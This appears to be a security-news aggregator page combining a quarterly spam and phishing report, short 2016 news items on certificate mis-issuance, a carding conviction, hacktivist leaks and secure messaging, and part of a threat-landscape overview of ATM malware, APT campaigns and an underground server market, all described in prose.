Spam mailings exploiting real-life events have long become an integral part of junk email. Sporting events are not as popular among spammers as political events, although their use is increasing with every year. There is a continuous stream of emails mentioning various political figures, while sport-related spam messages usually only appear in the run-up to an event. However, we have noticed that mass mailings can now be launched long before an event starts. For instance, emails exploiting the Olympic Games in Brazil were discovered over a year ago, in the second quarter of 2015. The majority of them were fraudulent emails designed to trick recipients and steal their personal information and money.

The classic scenario involves false notifications about lottery wins related to 2016 Olympics. The messages claim that the lottery was held by the official organizers of the games and the recipient was selected at random from millions of addresses. In order to claim the cash, the recipient has to reply to the email and provide some personal information.

Spam and phishing in Q2 2016

The text of the message was often contained in an attached file (.pdf, .doc, .jpg), while the body of the message only displayed a short text prompting the recipient to open the attachment.

Spam and phishing in Q2 2016

There were also more traditional messages where the spammer text was included directly in the body of the message.

Spam and phishing in Q2 2016

In addition to fraudulent messages, advertising spam was also sent out.

Unlike the Olympics, football tournaments have long been used by scammers to grab people’s attention to their spam. Q2 2016 saw the long-awaited UEFA European Championship, and in the run-up to the tournament spam traffic included fake notifications of lottery wins. The content was no different from that dedicated to the Olympic Games, and the emails also contained attachments explaining why the message was sent.

Spam and phishing in Q2 2016

The football theme was also exploited by ‘Nigerian’ scammers. They sent out emails supposedly on behalf of the former FIFA president, and used the infamous corruption scandal associated with his name to make their messages look more realistic. They believed that a fabricated story about how Sepp Blatter had supposedly received money and secretly transferred it to an account in a European bank would not arouse suspicion. In return for keeping the money in their bank accounts, the recipients were promised a 40% cut of the total sum.

Spam and phishing in Q2 2016

In order to convince recipients that the message was genuine, the authors even went to the trouble of using the correct name and domain in the ‘From’ field.

US politicians in spam

The presidential election campaign is now in full swing in the United States and the nominees and their entourages are under close media scrutiny. Of course, spammers couldn’t resist using the names of high-profile politicians in their advertising and fraudulent emails. For example, numerous ‘Nigerian’ letters were sent in the name of current president Barack Obama and his wife Michelle. In their ‘official’ emails, the ‘President’ and the ‘First lady’ assured the recipient that a bank card or a check for a very large sum of money had already been issued in their name. The only thing the recipient had to do was complete some formalities, and the money would be delivered shortly afterwards. In order to get the instructions from the White House the recipient had to send some personal information, including their email address and the password for their email account, as well as detailed passport information to spoofed email addresses.

Spam and phishing in Q2 2016

Another politician whose name regularly cropped up in spam was Donald Trump, one of the contenders for the US presidency. Spammers offered a unique Trump technique for earning money online: anyone who wanted to know how to get rich, had to click a link in the emails which were designed to look like news reports from CNN and Fox News.

Spam and phishing in Q2 2016

The links led to fake news sites also in the style of major media outlets and news networks. The sites contained a story about a simple method for earning money – the publication of links, which is basically another kind of spam distribution. In order to participate in the program, a user had to register by providing their phone number and email address.


Proportion of spam in email traffic

Spam and phishing in Q2 2016

Percentage of spam in global email traffic, Q2 2016

The largest percentage of spam in the second quarter – 59.46% – was registered in May and was 3 p.p. more than in April. The average percentage of spam in global email traffic for Q2 amounted to 57.25%.

Sources of spam by country

Spam and phishing in Q2 2016

Sources of spam by country, Q2 2016

In Q2 2016, the biggest three sources of spam remained the same as in the previous quarter – the US (10.79%), Vietnam (10.10%) and India (10.01%). However, the figures for each country changed: the gap between them narrowed to within a single percentage point.

China (6.52%) moved up to fourth with an increase of 1.43 p. p. compared to Q1. Mexico (4.55%) came fifth, followed by Russia (4.07%) and France (3.60%). Brazil (3.28%), which was fourth in the previous quarter, lost 2.2 p.p. and dropped to eighth place. Germany (2.97%) and Turkey (2.30%) completed the TOP 10.

Spam email size

Spam and phishing in Q2 2016

Breakdown of spam emails by size, Q1 and Q2 2016

Traditionally, the most commonly distributed emails are very small – up to 2 KB (72.26%), although the proportion of these emails dropped by 9.6 p.p. compared to the previous quarter. Meanwhile, the share of emails sized 10-20 KB increased by 6.76 p.p. The other categories saw minimal changes.

Malicious email attachments

Currently, the majority of malicious programs are detected proactively by automatic means, which makes it very difficult to gather statistics on specific malware modifications. So we have decided to turn to the more informative statistics of the TOP 10 malware families.

TOP 10 malware families

The three most popular malware families remained unchanged from the previous quarter – Trojan-Downloader.JS.Agent (10.45%), Trojan-Downloader.VBS.Agent (2.16%) and Trojan-Downloader.MSWord.Agent (1.82%).

The Trojan.Win32.Bayrob family moved up to fourth place (1.68%), while the Backdoor.Win32.Androm family fell from fourth to ninth place with 0.6%.

Spam and phishing in Q2 2016

TOP 10 malware families in Q2 2016

A newcomer to this ranking was the Trojan.Win32.Inject family (0.61%). The malicious programs from this family embed their code in the address space of other processes.

The Trojan-Spy.HTML.Fraud family (0.55%) rounded off the TOP 10 in Q2 2016.

Countries targeted by malicious mailshots

Spam and phishing in Q2 2016

Distribution of email antivirus verdicts by country, Q2 2016

Germany (14.69%) topped the ranking of countries targeted by malicious mailshots, although its share decreased 4.24 p.p. It was followed by China (13.61%) whose contribution grew 4.18 p.p. Japan (6.42%) came third after ending the previous quarter in seventh with a share of 4.29%.

Fourth place was occupied by Brazil (5.57%). Italy claimed fifth with a share of 4.9% and Russia remained in sixth (4.36%).

The US (4.06%) was the seventh most popular target of malicious mailshots. Austria (2.29%) rounded off this TOP 10.


In Q2 2016, the Anti-Phishing system was triggered 32,363,492 times on the computers of Kaspersky Lab users, which is 2.6 million less than the previous quarter. Overall, 8.7% of unique users of Kaspersky Lab products were attacked by phishers in Q2 of 2016.

Geography of attacks

The country where the largest percentage of users is affected by phishing attacks was China (20.22%). In Q2 2016, the proportion of those attacked increased by 3.52 p.p.

Spam and phishing in Q2 2016

Geography of phishing attacks*, Q2 2015

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 2.87 p.p. and accounted for 18.63%, placing the country second in this ranking. Algeria (14.3%) came third following a 2.92 p.p. increase in its share compared to the previous quarter.

TOP 10 countries by percentage of users attacked:

China 20.22%
Brazil 18.63%
Algeria 14.3%
United Kingdom 12.95%
Australia 12.77%
Vietnam 11.46%
Ecuador 11.14%
Chile 11.08%
Qatar 10.97%
Maldives 10.94%
Organizations under attack

The statistics on phishing targets are based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q2 of 2016, the share of the ‘Global Internet portals’ category (20.85%), which topped the rating in the first quarter, decreased considerably – by 7.84 p.p. The share of the ‘Financial organizations’ category grew 2.07 p.p. and accounted for 46.23%. This category covers ‘Banks’ (25.43%, +1.51 p.p.), ‘Payment systems’ (11.42%, -0.42 p.p.) and ‘Online stores’ (9.39%, +0.99 p.p.).


Distribution of organizations affected by phishing attacks by category, Q2 2016

The share of attacks on the ‘Social networking sites’ category increased by 2.65 p.p. and reached 12.4%. The ‘Online games’ category was also attacked more often (5.65%, + 1.96 p.p.). Meanwhile, the ‘Telephone and Internet service providers’ (4.33%) and the ‘IMS’ (1.28%) categories lost 1.17 p.p. and 2.15 p.p. respectively.

Hot topics this quarter

The Olympics in Brazil

For a number of years now Brazil has been among the countries with the highest proportion of users targeted by phishing. In 2015 and 2016 phishers have focused on the Rio Olympic Games in Brazil. Last quarter showed that as well as ordinary users, the potential victims of phishing included the organizers of the Olympic Games.

Spam and phishing in Q2 2016

The Olympic theme remained popular in Q2, with phishers working overtime to send out fake notifications about big cash wins in a lottery that was supposedly organized by the Brazilian government and the Olympic Committee.

‘Porn virus’ for Facebook users

Facebook users are often subjected to phishing attacks. During one attack in the second quarter, a provocative video was used as bait. To view it, the user was directed to a fake page imitating the popular YouTube video portal, and told to install a browser extension.

Spam and phishing in Q2 2016

This extension requested rights to read all the data in the browser, potentially giving the cybercriminals access to passwords, logins, credit card details and other confidential user information. The extension also distributed more links on Facebook that directed to itself, but which were sent using the victim’s name.

Phisher tricks

Compromising domains with good reputation

To bypass security software filters, fraudsters try to place phishing pages on domains with good reputations. This significantly reduces the probability of them being blocked and means potential victims are more trusting. The phishers can strike it big if they can use a bank or a government agency domain for their purposes. In Q2, we came across a phishing attack targeting the visitors of a popular Brazilian e-commerce site: the fake page was located on the domain of a major Indian bank. This is not the first time fraudsters have compromised the domain of a large bank and placed their content on it.

Spam and phishing in Q2 2016

Phishing pages targeting the users of the Brazilian store americanas.com

When trying to purchase goods on the fake pages of the store, the victim is asked to enter lots of personal information. When it’s time to pay, the victim is prompted to print out a receipt that now shows the logo of a Brazilian bank.

The domains of state structures are hacked much more frequently by phishers. In Q2 2016, we registered numerous cases where phishing pages were located on the domains belonging to the governments of various countries. Here are just a few of them:

Spam and phishing in Q2 2016

Phishing pages located on the domains of government authorities

The probability of these links being placed on blacklists is negligible thanks to the reputation of the domain.

TOP 3 organizations attacked

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component fall on phishing pages hiding behind the names of fewer than 15 companies.

The TOP 3 organizations attacked most frequently by phishers accounted for 23% of all phishing links detected in Q2 2016.

Organization % of detected phishing links
1 Microsoft 8.1
2 Facebook 8.03
3 Yahoo! 6.87
In Q2 2016, this TOP 3 ranking saw a few changes. Microsoft was the new leader with 8.1% (+0.61 p.p.), while Facebook (8.03%, +2.32 p.p.) came second. The share of attacks targeting Yahoo! (6.87%) fell 1.46 p.p., leaving last quarter’s leader in third.

Q2 leader Microsoft is included in the ‘Global Internet portals’ category because the user can access a variety of the company’s services from a single account. This is what attracts the fraudsters: in the event of a successful attack, they gain access to a number of services used by the victim.

Spam and phishing in Q2 2016

Example of phishing on Live.com, a Microsoft service


In the second quarter of 2016, the proportion of spam in email traffic increased insignificantly – by 0.33 p.p. – compared to the previous quarter and accounted for 57.25%. The US remained the biggest source of spam. As in the previous quarter, the top three sources also included Vietnam and India.

Germany was once again the country targeted most by malicious mailshots, followed closely by China. Japan, which was seventh in the previous quarter’s ranking, completed the TOP 3 in Q2.

Trojan-Downloader.JS.Agent remained the most popular malware family distributed via email. Next came Trojan-Downloader.VBS.Agent and Trojan-Downloader.MSWord.Agent. A significant amount of malicious spam was used to spread ransomware Trojans such as Locky. For almost a month, however, cybercriminals did not distribute their malicious spam, but then the Necurs botnet began working again. We don’t expect to see any significant reduction in the volume of malicious spam in the near future, although there may be changes in email patterns, the complexity of the malware, as well as the social engineering methods used by attackers to encourage a user to launch a malicious attachment.

The focus of phishing attacks shifted slightly from the ‘Global Internet portals’ to the ‘Financial organizations’ category.

The theme of the Olympic Games was exploited by both phishers and spammers to make users visit fake pages with the aim of acquiring their confidential information or simply to get their money.

Events in the political arena, such as the presidential election in the US, also attracted spammers, while the sites of government agencies were compromised in phishing attacks.

As we can see, the overriding trend of the quarter is that of fraud and making quick money from victims using direct methods such as Trojan cryptors that force unprotected users to pay a ransom, or phishing attacks that target financial organizations, rather than long drawn-out scams. All of this once again highlights the need for both comprehensive protection on computers and increased vigilance by Internet users.

Chinese Certificate Authority 'mistakenly' gave out SSL Certs for GitHub Domains
30.8.2016 thehackernews Safety
A Chinese certificate authority (CA) appeared to be making a significant security blunder by handing out duplicate SSL certificates for a base domain if someone just has control over its any subdomain.
The certificate authority, named WoSign, issued a base certificate for the Github domains to an unnamed GitHub user.
But How? First of all, do you know, the traditional Digital Certificate Management System is the weakest link on the Internet today and has already been broken?
Billions of Internet users blindly rely on hundreds of Certificate Authorities (CA) around the globe to ensure the confidentiality and integrity of their personal data.
But, these CAs have powers to issue valid SSL cert for any domain you own, despite the fact you already have one purchased from another CA.
...and that's the biggest loophole in the CA system.
In the latest case as well, WoSign issued a duplicate SSL certificate for GitHub domains without verifying ownership of the base domain.
The incident was first publicly disclosed by British Mozilla programmer Gervase Markham on Mozilla's security policy mailing list saying the issue occurred over a year ago in July 2015 but went unreported.
"In June 2015, an applicant found a problem with WoSign's free certificate service, which allowed them to get a certificate for the base domain if they were able to prove control of a subdomain," Markham wrote in the mailing list.
According to Markham, an unnamed security researcher accidentally discovered this security blunder when trying to get a certificate for 'med.ucf.edu' but mistakenly also applied for 'www.ucf.edu' and WoSign approved it, handing over the certificate for the university's primary domain.
For testing purpose, the researcher also used this trick against Github base domains i.e. github.com and github.io, by proving his control over a user-based subdomain.
...And guess what? WoSign handed over the certificate for GitHub main domains, too.
The researcher reported this issue to WoSign by giving only the Github certificate as an example. Thus, the Chinese CA only revoked the GitHub certificate, despite revoking both the certificates.
Why Just One? It is quite possible that the CA company doesn't have any tracking ability to discover and revoke all mistakenly issued base certificates for other domains by self-investigation even after getting informed of the problem.
The researcher recently got in touch with Google and reported that the ucf.edu cert had still not been revoked almost a year later.
How to check whether a rogue cert for your domain has been issued to someone else, probably a malicious attacker?

Solution: Certificate Transparency or CT, a public service that allows individuals and companies to monitor how many digital security certs have secretly been issued for their domains.
Certificate Transparency requires CAs to declare publicly (to Certificate Log) every digital cert they have generated. Even WoSign has participated in CT.
Certificate Log offers you a way to look up all of the digital certificates that have been issued for your domain name.
Also read: Learn How Certificate Transparency Monitoring Tool Helped Facebook Early Detect Duplicate SSL Certs?
Although Certificate Transparency doesn't prevent CA from issuing forged certificates, it makes the process of detecting rogue certificates much easier.
Currently, Google, Symantec, DigiCert, and a few other CAs are hosting public CT logs.
You can try Google's Certificate Transparency Lookup Tool or Comodo's Certificate Transparency Search tool to check all certificates present in public Certificate Transparency logs that have been issued for your domain.
If you find a fraud certificate issued for your domain, report respective CA and address it immediately.

Russian Lawmaker's Son Convicted of Stealing 2.9 Million Credit Card Numbers
29.8.2016 thehackernews Crime
Russian Lawmaker's Son Convicted of Stealing 2.9 Million Credit Card Numbers
The son of a prominent Russian lawmaker has been found guilty in the United States of running a hacking scheme that stole and sold 2.9 million US credit card numbers using Point-of-Sale (POS) malware, costing financial institutions more than $169 Million.
Roman Seleznev, 32, the son of Russian Parliament member Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives, which sparked an international dispute between American and Russian authorities, who characterized the extradition as a "kidnapping."
Prosecutors introduced evidence from a corrupted laptop seized by the authorities at the time of his arrest. "I don't know of any case that has allowed such outrageous behavior," said his lawyer, John Henry Browne.
Also Read: How to Freeze Credit Report To Protect Yourself Against Identity Theft.
According to the Department of Justice, Seleznev, who also went by the moniker 'Track2' online, was convicted in a Washington court on Thursday of 38 charges related to stolen credit card details, which includes:
Ten counts of Wire Fraud
Nine counts of obtaining information from a Protected Computer
Nine counts of possession of 15 Unauthorized Devices
Eight counts of Intentional Damage to a Protected Computer
Two counts of Aggravated Identity Theft
Seleznev and potentially other criminals who are unknown to the authorities developed a hacking scheme that used automated techniques to hack into POS machines in retailers and then installed malware to steal copies of credit card numbers.
The lists of stolen credit card numbers were then sold on various online "carding" websites. According to prosecutors, more than 3,700 businesses were hit by the hacking attacks.
If convicted, Seleznev could face up to 40 years in prison for hacking into Seattle pizza shops, retailers and U.S. businesses around the globe from 2008 to 2014 and stealing millions of credit card details.
Seleznev faces a mandatory jail term of 4 years, and will be sentenced on 2 December.
The US Justice Department said Seleznev "was prosecuted for his conduct not his nationality."

Shad0wS3C group hacked the Paraguay Secretary of National Emergency
29.8.2016 securityaffeirs Hacking

Shad0wS3C hacker group has hacked the Paraguay’s Secretary of National Emergency (SNE) and leaked online a dump from a PostgreSQL database.
Not so long ago I interviewed Gh0s7, the leader of the Shad0wS3C hacker crew, now he contacted me to announce the hack of the Paraguay’s Secretary of National Emergency (SNE).

“The reason for this data leak. The government of Paraguay has violated so many human rights, and either the UN (Don’t rely on them) or anyone has done anything. just to name a few:

Impunity and justice system
Torture and other ill-treatment
Violation of Women’s and girls’ rights
Violation against Human rights defenders”
this is the Shad0wS3C message.

The group has shared as proof of the hack a data dump from a PostgreSQL database, just after the announced security breach the Government website sen.gov.py was up.

The leaked data dump includes information about material stocks and also PII belonging to Paraguay’s Secretary of National Emergency employees. Users’ records include names, emails, phone numbers, addresses, salary information, and other data related to their activity within the Government organization (i.e Roles in the case of national emergencies).

Shad0wS3c hack SNE

The leaked data also includes details on hundreds website login credentials, with hashed passwords.

Shad0wS3c is a hacker group recently formed, in July it claimed responsibility for the data breach of the EJBCA that resulted in the exposure of credentials and certificates.

DNC staffers are invited to use ‘Snowden-Approved’ App Signal in response to the hack
29.8.2016 securityaffeirs Hacking

In the aftermath of the DNC hack the staffers were instructed in the use of the popular instant messaging Signal app, also called the “Snowden-approved” app.
The need of privacy is pushing the IT industry in developing secure messaging systems that implement end-to-end encrypted to protect users from prying eyes. Signal is probably the most popular app in this moment.

Signal app comes from Open Whisper Systems and is available for both Androids and iOS devices. If you are looking for the most secure messaging app, you can use Signal and strengthen security in your texts and phone calls. It is free of charge and it encrypts your data.

The app is automatically in sync with your address book and this makes it really easy to encrypt your communication with all your contacts. In this way, you do not need special login credentials for accessing the app and initializing its effectiveness.

If you search for Signal on the Internet you will discover that Edward Snowden is probably his most illustrious users and testimonial.

“Use anything by Open Whisper Systems” Snowden says.

signal app

The Cryptographer and Professor at Johns Hopkins University Matt Green and the popular security expert Bruce Schneier are other two admirers of the Signal app, recently we so the application also in the popular TV series Mr. Robot.

There is no doubt, Signal is the first choice for hackers and security experts … and not only them.

In the aftermath of the Democratic National Committee hack the staffers were instructed in the use of the popular instant messaging app, also called the “Snowden-approved” app.

Visualizza l'immagine su Twitter
Visualizza l'immagine su Twitter
Edward Snowden ✔ @Snowden
2015: Even if he revealed unlawful government surveillance, put him in jail!
2016: wait what apps does he use
22:58 - 27 Ago 2016
6.251 6.251 Retweet 10.505 10.505 Mi piace
“Signal, staffers in the meeting were told, was “Snowden-approved.” A week after the meeting at the campaign headquarters, according to two people who have worked with the D.N.C. and the Clinton campaign, an e-mail was sent out instructing staffers where to download the app and how to use it.” reported Vanity Fair.

“Edward Snowden, who famously requires that people place their cell phones in a freezer before he agrees to meet with them in person (the freezer, or fridge, acts as a faraday cage and blocks any N.S.A.-like snooping of people’s whereabouts), has touted the security of Signal numerous times, saying on Twitter, “I use Signal every day.””

Edward Snowden ✔ @Snowden
Report: Russia hijacking activist accounts via telcos.

Use Signal, and always do this: (http://support.whispersystems.org/hc/en-us/articles/213134107-How-do-I-verify-the-person-I-m-sending-messages-to-is-who-they-say-they-are- …) https://twitter.com/FredericJacobs/status/726128513695109120 …
12:55 - 30 Apr 2016
854 854 Retweet 833 833 Mi piace
A few days after the DNC security breach was publicly disclosed, the DNC staffers received a memo containing detailed instructions on how to download and use the Signal app.

The use of the popular messaging app among DNC staffer is a clear sign of the need of a proper security posture among top political officials and staffer managing sensitive information.

If you want to give a look to the other Secure Messaging Apps on the market, you can read the post I published here.

The Network of NewSat satellite telco firm was the ‘most corrupted’ of ever
29.8.2016 securityaffeirs Security

The Network of NewSat satellite firm was the ‘most corrupted’ of ever, it was hacked by foreign hackers and it had interception kit in its data centre.
The story demonstrates the high interest of spy agencies in hacking communication systems.

Once upon a time, the Australian satellite company was deeply hacked by cyber spies that completely corrupted its network. The company is not out of the business, its assets were sold off last year after it went into administration.

According to a former staffer that has spoken on condition of anonymity to the Australian Broadcasting Corporation, it was ‘the most corrupted’ network the nation’s intelligence had encountered.

According to the ABC broadcast, the news of the hack was already reported in 2013, when the company reported the security breach to the Australian Signals Directorate. The Chinese nation-state hackers made the organization “the most corrupted network [the Directorate had ever seen”, the ABC reports.

Former Central Intelligence Agency Chief Michael Hayden declared that the China’s efforts against Australia aimed at “the theft of information, and really by and large the theft of information for commercial profit.”

According to the official hackers were interested in sensitive information such as the plans for a Lockheed Martin-designed satellite dubbed Jabiru-1.

“Given we were up against China, state-sponsored, a lot of money behind them and a lot of resources and we were only a very small IT team, it certainly wasn’t a fair fight for us,” Newsat’s former IT manager Daryl Peter said.

The issue had come to the headlines because the Newsat company was planning to install a restricted encryption tool to allows the NSA to spy on satellite communications, so it notified its intent to the ASD.

The Australian Signals Directorate refused to release the encryption tool to Newsat until it was able to eradicate the intruders from its systems. intelligence officials replied to the company telling its networks were “the most corrupted” they had seen.

NewSat satellite communications
Australian satellite company Newsat Ltd was forced to rebuild its entire network in secret. (Four Corners)

Intelligence officials who examined the Newsat infrastructure confirmed it was “the most corrupted” they had seen.

“They actually said to us that we were the worst,” Mr Peter said.

“What came out of that meeting was we had a serious breach on our network and it wasn’t just for a small period of time, they’d been inside our network for a long period, so maybe about two years. And the way it was described to us was they are so deep inside our network it’s like we had someone sitting over our shoulder for anything we did.”

According to the anonymous source that has revealed the story to the ABC, the Newsat network was completely rebuilt.

Anyway the NewSat company installed an Australian Government communications interception system in its data centre, but the Australian Government had refused to deploy the restricted NSA encryption tool due to the security breach it discovered.

“They (NewSat) had a lot of dealings with Middle East organisations,” the source said.

Let me suggest reading a detailed analysis published by the ABC’s Four Corners that confirms Australian Government computer networks were breached by hackers.

IT threat evolution in Q2 2016. Overview
29.8.2016 Safety

Targeted attacks and malware campaigns

Cha-ching! Skimming off the cream

Earlier in the year, as part of an incident response investigation, we uncovered a new version of the Skimer ATM malware. The malware, which first surfaced in 2009, has been re-designed. So too have the tactics of the cybercriminals using it. The new ATM infector has been targeting ATMs around the world, including the UAE, France, the United States, Russia, Macau, China, the Philippines, Spain, Germany, Georgia, Poland, Brazil and the Czech Republic.

Rather than the well-established method of fitting a fake card-reader to the ATM, the attackers take control over the whole ATM. They start by installing the Skimer malware on the ATM – either through physical access or by compromising the bank’s internal network. The malware infects the ATM’s core – the part of the device responsible for interaction with the wider bank infrastructure, card processing and dispensing of cash. In contrast to a traditional card skimmer, there are no physical signs that the ATM is infected, leaving the attackers free to capture data from cards used at the ATM (including a customer’s bank account number and PIN) or steal cash directly.

The cybercriminal ‘wakes up’ the infected ATM by inserting a card that contains specific records on the magnetic stripe. After reading the card, Skimer is able execute a hard-coded command, or receive commands through a special menu activated by the card. The Skimer user interface appears on the display only after the card is ejected and only if the cybercriminal enters the correct session key within 60 seconds. The menu offers 21 different options, including dispensing money, collecting details of cards that have been inserted in the ATM, self-deletion and performing updates. The cybercriminal can save card details on the chip of their card, or print the details it has collected.

The attackers are careful to avoid attracting attention. Rather than take money directly from the ATM – which would be noticed immediately – they wait (sometimes for several months) before taking action. In most cases, they collect data from skimmed cards in order to create cloned cards later. They use the cloned cards in other, non-infected ATMs, casually withdrawing money from the accounts of the victims in a way that can’t be linked back to the compromised ATM.

Kaspersky Lab has several recommendations to help banks protect themselves. They should carry out regular anti-virus scans; employ whitelisting technologies; apply a good device management policy; make use of full disk encryption; password protect the BIOS of ATMs; enforce hard disk booting and isolate the ATM network from the rest of the bank infrastructure. The magnetic strip of the card used by the cybercriminals to activate the malware contains nine hard-coded numbers. Banks may be able to proactively look for these numbers within their processing systems: so we have shared this information, along with other Indicators of Compromise (IoCs).

In April, one of our experts provided an in-depth examination of ATM jackpotting and offered some insights into what should be done to secure these devices.

New attacks, old exploit

In recent months we have been tracking a wave of cyber-espionage attacks conducted by different APT groups across the Asia-Pacific and Far East regions. They all share one common feature: they exploit the CVE-2015-2545 vulnerability. This flaw enables an attacker to execute arbitrary code using a specially crafted EPS image file. It uses PostScript and can evade the Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods built into Windows. The Platinum, APT16, EvilPost and SPIVY groups were already known to use this exploit. More recently, it has also been used by the Danti group.

IT threat evolution in Q2 2016. Overview

Danti, first identified in February 2016 and still active, is highly focused on diplomatic bodies. The group predominantly targets Indian government organizations, but data from the Kaspersky Security Network (KSN) indicates that it has also infected targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

The exploit is delivered using spear-phishing e-mails spoofed to look as though they have been sent by high-ranking Indian government officials. When the victim clicks on the attached DOCX file, the Danti backdoor is installed, allowing the attackers to capture sensitive data.

The origin of the Danti group is unclear, but we suspect that it might be connected to the NetTraveler and DragonOK groups: it’s thought that Chinese-speaking hackers are behind these attacks.

Kaspersky Las has also seen another campaign that makes use of the CVE-2015-2545 vulnerability: we’ve called this SVCMONDR after the Trojan that is downloaded once the attackers get a foothold in the victim’s computer. This Trojan is different to the one used by the Danti group, but it shares some common features with Danti and with APT16 – the latter is a cyber-espionage group believed to be of Chinese origin.

One of the most striking aspects of these attacks is that they are successfully making use of a vulnerability that was patched by Microsoft in September 2015. In November, we predicted that APT campaigns would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware to achieve their goals. This is a case in point: using a known vulnerability, rather than developing a zero-day exploit. This underlines the need for companies to pay more attention to patch management to secure their IT infrastructure.

New attack, new exploit

Of course, there will always be APT groups that seek to take advantage of zero-day exploits. In June, we reported on a cyber-espionage campaign – code-named ‘Operation Daybreak‘ and launched by a group named ScarCruft – that uses a previously unknown Adobe Flash Player exploit (CVE-2016-1010). This group is relatively new and has so far managed to stay under the radar. We think the group might have previously deployed another zero-day exploit (CVE-2016-0147) that was patched in April.

The group have targeted a range of organizations in Russia, Nepal, South Korea, China, India, Kuwait and Romania. These include an Asian law enforcement agency, one of the world’s largest trading companies, a mobile advertising and app monetization company in the United States, individuals linked to the International Association of Athletics Federations and a restaurant located in one of Dubai’s top shopping centres. The attacks started in March 2016: since some of them are very recent, we believe that the group is still active.

The exact method used to infect victims is unclear, but we think that the attackers use spear-phishing e-mails that point to a hacked website hosting the exploit. The site performs a couple of browser checks before redirecting victims to a server controlled by the hackers in Poland. The exploitation process consists of three Flash objects. The one that triggers the vulnerability in Adobe Flash Player is located in the second SWF file delivered to the victim. At the end of the exploitation chain, the server sends a legitimate PDF file, called ‘china.pdf’, to the victim: this seems to be written in Korean.

In Q2 2016, @kaspersky #mobile security products detected 3.6M malicious installation packages #KLreport
The attackers use a number of interesting methods to evade detection, including exploiting a bug in the Windows Dynamic Data Exchange (DDE) component in order to bypass security solutions – a method not seen before. This flaw has been reported to Microsoft.

Flash Player exploits are becoming rare, because in most cases they need to be coupled with a sandbox bypass exploit – this makes them tricky to do. Moreover, although Adobe is planning to drop Flash support soon, it continues to implement new mitigations to make exploitation of Flash Player increasingly difficult. Nevertheless, resourceful groups such as ScarCruft will continue to try and find zero-day exploits to target high-profile victims.

While there’s no such thing as 100 per cent security, the key is to increase security defences to the point that it becomes so expensive for an attacker to breach them that they give up or choose an alternative target. The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host-based intrusion prevention and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Kaspersky Lab products detect the Flash exploit as ‘HEUR:Exploit.SWF.Agent.gen’. The attack is also blocked proactively by our Automatic Exploit Prevention (AEP) component. The payloads are detected as ‘HEUR:Trojan.Win32.ScarCruft.gen’.

XDedic: APT-as-a-Service

Kaspersky Lab recently investigated an active cybercriminal trading platform called xDedic, an online black market for hacked server credentials around the world – all available through the Remote Desktop Protocol (RDP). We initially thought that this market extended to 70,000 servers, but new data suggests that the XDedic market is much wider – including credentials for 176,000 servers. XDedic includes a search engine, enabling potential buyers to find almost anything – from government and corporate networks – for as little as $8 per server. This low price provides ‘customers’ with access to data on such servers and their use as a bridgehead for further targeted attacks.

IT threat evolution in Q2 2016. Overview

The owners of the ‘xdedic[.]biz’ domain claim that they have no relation to those selling access to hacked servers – they are simply selling a secure trading platform for others. The XDedic forum has a separate sub-domain, ‘partner[.]xdedic[.]biz’, for the site’s ‘partners’ – that is, those selling hacked servers. The Xdedic owners have developed a tool that automatically collects information about the system, including websites available, software installed and more. They also provide others tools to its partners, including a patch for RDP servers to support multiple logins for the same user and proxy installers.

The existence of underground markets is not new. But we are seeing a greater level of specialisation. And while the model adopted by the XDedic owners isn’t something that can be replicated easily, we think it’s likely that other specialized markets are likely to appear in the future.

Data from KSN helped us identify several files that were downloaded from the XDedic partner portal: Kaspersky Lab products detect these files as malicious. We have also blacklisted the URLs of control servers used for gathering information about the infected systems. Our detailed report on XDedic contains more information on hosts and network-based IoCs.

Lurking around the Russian Internet

Sometimes our researchers find malware that is particular about where it infects. On the closed message boards used by Russian cybercriminals, for example, you sometimes see the advice ‘Don’t work with RU’ – offered by experienced criminals to the younger generation: i.e. don’t infect Russian computers, don’t steal money from Russians and don’t use them to launder money. There are two good reasons for this. First, online banking is not as common as it is in the west. Second, victims outside Russia are unlikely to lodge a complaint with the Russian police – assuming, of course, that they even know that Russian cybercriminals are behind the malware that has infected them.

But there are exceptions to every rule. One of these is the Lurk banking Trojan that has been used to steal money from victims in Russia for several years. The cybercriminals behind Lurk are interested in telecommunications companies, mass media and news aggregators and financial institutions. The first provide them with the means to transfer traffic to the attackers’ servers. The news sites provide them with a way to infect a large number of victims in their ‘target audience’ – i.e. the financial sector. The Trojan’s targets appear to include Russia’s four largest banks.

The primary method used to spread the Lurk Trojan is drive-by download, using the Angler exploit pack: the attackers place a link on compromised websites that leads to a landing page containing the exploit. Exploits (including zero-days) are typically implemented in Angler before being used in other exploit packs, making it particularly dangerous. The attackers also distribute code through legitimate websites, where infected files are served to visitors from the .RU zone, but others receive clean files. The attackers use one infected computer in a corporate network as a bridgehead to spread across the organization. They use the legitimate PsExec utility to distribute the malware to other computers; and then use a mini-dropper to execute the Trojan’s main module on the additional computers.

In Q2 2016, @kaspersky #mobile security products detected 83,048 mobile #ransomware Trojans #KLreport
There are a number of interesting features of the Lurk Trojan. One distinct feature, that we discussed soon after it first appeared, is that it is ‘file-less’ malware, i.e. it exists only in RAM and doesn’t write its code to the hard drive.

The Trojan is also set apart because it is highly targeted. The authors do their best to ensure that they infect victims that are of interest to them without catching the attention of analysts or researchers. The incidents known to us suggest Lurk is successful at what it was designed for: we regularly receive reports of thefts from online banking systems; and forensic investigations after the incidents reveal traces of Lurk on the affected computers.

Malware stories

Cybercriminals get ready for Rio

Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events, so it’s no surprise that we’ve seen an increase in cybercriminal activity related to the forthcoming Olympic Games in Brazil.

